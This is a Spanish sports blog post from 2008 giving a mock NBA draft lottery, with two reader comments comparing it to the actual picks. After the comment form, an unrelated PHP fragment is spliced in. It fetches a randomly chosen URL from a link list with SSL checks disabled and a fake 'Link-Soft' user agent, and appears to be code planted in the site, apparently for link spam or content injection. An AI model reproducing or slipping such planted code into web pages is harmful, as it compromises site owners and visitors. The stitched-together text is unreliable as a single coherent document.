NBA Draft 2008. Mock TJNBA

24 de June de 2008 por Dantley

A las puertas del draft que se celebrará el jueves en Nueva York, nos sumamos a la fiesta con nuestras particulares predicciones para las 14 posiciones de lotería. Como suele ser habitual los GM se encargarán de dejarnos en mal lugar. Algunas elecciones están fundadas en rumores que van circulando conforme se acerca la fecha, mientras que otras son simples suposiciones teniendo en cuenta la calidad de cada jugador y las necesidades de los equipos.

1. Chicago – Derrick Rose

Paxson apostará por un jugador como Rose capaz de hacer mejores a sus compañeros, frente al estilo más egoísta de Beasley. Rose es nativo de Chicago por lo que la elección será bien recibida.

2. Miami – Michael Beasley

Cualquier otra decisión es correr un riesgo innecesario. No obstante, entra dentro de lo probable un intercambio de rondas con Minnesota que lleve a Mayo a Miami

3. Minnesota – OJ Mayo

Brook López podría tener más sentido, pero OJ Mayo tiene mucho más baloncesto. Como decíamos, quizá los Wolves acaben con Beasley.

4. Seattle – Jerryd Bayless

Con Durant y Green como núcleo para la reconstrucción, urge un base que mejore a Watson y Ridnour. Aunque tras los fiascos en pasados drafts en la posición de center (Swift, Petro, Sene) Brook López supondría una mejora.

5. Memphis – Kevin Love

Esta predicción responde tanto a una necesidad de mejorar el juego interior –Warrick se queda corto y Milicic sigue siendo Milicic- como a un rumor que cobra fuerza en los últimos días.

6. New York – Russell Westbrook

Westbrook encaja en la filosofía de juego rápido de D’Antoni y aportaría la defensa exterior que necesita. Distinto es que Russell Westbrook sea realmente el sexto mejor jugador del draft. No se descarta un trade de última hora.

7. L.A. Clippers – Eric Gordon

Los Clippers necesitan un base. Sin embargo, Augustin no parece merecedor de un pick 7. Eric Gordon puede aportar minutos de 1 y de 2. Otra opción es un trade hacia abajo y que el pick 7 vaya a Brook López.

8. Milwaukee – Joe Alexander

Los rumores apuntan a que Joe Alexander tiene la certeza de que los Bucks lo elegirán en la octava elección. Un buen 3 encajaría en Milwaukee. La pregunta es si Alexander aportará algo más que intensidad.

9. Charlotte – Brook López

Okafor nunca llegó a responder a las expectativas y es un permanente peligro de lesión. López puede ser un buen suplente en posiciones interiores. Si López no estuviera disponible y sí lo estuvieran Gordon o Westbrook, sería uno de estos dos jugadores

10. New Jersey – Danilo Gallinari

Otro rumor consistente. Gallinari puede encontrarse a gusto en un mercado metropolitano muy italiano y puede servir de recambio a Richard Jefferson

11. Indiana – DJ Augustin

Indiana podría empezar con la carrera de las apuestas por hombres altos de futuro, pero DJ Augustin puede ser un jugador más hecho que de muchos minutos de descanso a Tinsley

12. Sacramento – Anthony Randolph

Los Kings realmente necesitan mejora en el puesto de base, pero a estas alturas Anthony Randolph puede merecer la pena el riesgo.

13. Portland – Donta Greene

Portland ya tiene suficiente material de futuro en posiciones interiores. Greene es un jugador con mucha clase que puede aportar desde el principio. Otro candidato es Rush, dependiendo de cuánto confíen en Rudy Fernández.

14. Golden State – DeAndre Jordan

Las elecciones de los Warriors son impredecibles. No cubre una de sus necesidades más perentorias, pero a estas alturas de draft es muy difícil encontrar valores seguros. Jordan es la apuesta con más potencial de ser algo grande y de ser un gran error a partes iguales.

Comenta

2 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Uff, no creo que Westbrook vaya a irse tan arriba. Diria que Seattle coje a Lopez y Bayless acaba con D’Antoni, a Westbrook lo veo en Portland.

      Citar

  2. TheDeerHunter dice:
    #2

    (no creo que Westbrook vaya a irse tan arriba…) 😀
    Al pick4, al final.

    Cosas.
    1&2-Los dos primeros estaban ya bastante claros. Sin sorpresas ni sobresaltos.
    3-OJ. Mayo, que quería irse a un grande, lo traspasan a Memphis en un multitraspaso. Minesota se queda con Love y Miller ¿no querías sopa, OJ??? ya se estaba hablando mucho de ese movimiento, aunque lo que se apuntaba es que iba a ser con Miami el asunto.
    4-Westbrook a Seattle en el 4º… aunque a pesar del bajón, a Bayless al final la jugada le va a salir cojonuda (al menos deportivamente) Y a Portland ni te digo. Luego hablamos del asunto.
    5-Memphis… esperado pick, inesperado movimiento. Bueno para Gasol¿?¿?¿ con este equipo ni se sabe, pero lo que apunta es que apuestan por él.
    6-Gallinari. Era una de las opciones que se barajaban desde el principio.
    7-Gordon. Clavao.
    8-Clavo… además Milwaukee pillan a Jefferson y se libran del chino. Vuelven a tener buena pinta ¿¿??¿? una vez más 😐
    9-Augustine. Un base novato para Larry Brown. Esta elección importa un pimiento. Al amigo Larry lo mismo le daba uno que otro, que que le capen el perro… en el banquillo queda mejor un base, que ocupa menos espacio.
    10-Brook Lopez. Además se hacen con el JianLian y Bobby Simmos. Pues bien… alguno se ha sorprendido que el pívot haya bajado tanto y otros que se veía venir.
    11-Al final Indiana pilla a Bayless y lo traspasa a Portland por Jack, Josh McRoberts y Brandon Rush. Interesante movimiento por parte de ambos.
    12-Jason Thompson. ¿?¿
    13-Portland Brandon Rush a Indiana por Bayless y Diogu ¿Cómo se las arreglan para trincar cacho siempre??? Grandísimo movimiento (parece) Aunque Sergio ya puede ir haciendo las maletas.
    14-GS Anthony Randolph.

    Tu mock estaba bastante bien hilado, Dantley.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>